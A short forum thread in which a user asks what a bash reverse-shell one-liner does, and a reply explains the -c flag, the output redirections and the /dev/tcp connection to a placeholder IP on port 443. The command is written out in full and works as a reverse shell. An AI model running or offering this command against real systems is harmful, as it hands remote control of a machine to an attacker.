hi,
can someone explain the following one-liner/payload:
bash -c “bash -i >& /dev/tcp/xx.xx.xx.xx/443 0>&1”
so, with bash -i i crate an interactive shell, right? but what is the bash -c and the >& /dev/tcp/xx.xx.xx.xx/443 0>&1? What is the context of this?
thx for the help…
Hello, I have an answer for you:
-c: Commands are read from a string
&>word, >word 2>&1, and >&word are the same: the 0 is an input, the 1 is a standard output, and 2 is an error output. Standard output and error output for the word are redirected.
/dev/tcp/xx.xx.xx.xx/443: Establish a connection via tcp on this IP address/port.
0>&1: to make input
okay…hmmm…thx…i think i understand…so, i try to explain this in my own words: create an interactive shell on this specific ip/port with input and output…and the whole command is use as a string. Is this right? Almost?
Yes, that is correct, expressed in a simple way. 